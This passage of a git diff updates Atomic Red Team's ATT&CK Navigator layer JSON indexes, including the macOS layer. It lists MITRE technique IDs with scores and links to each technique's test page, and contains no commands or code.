Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file + diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index a869ee3d..8b137891 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json @@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View 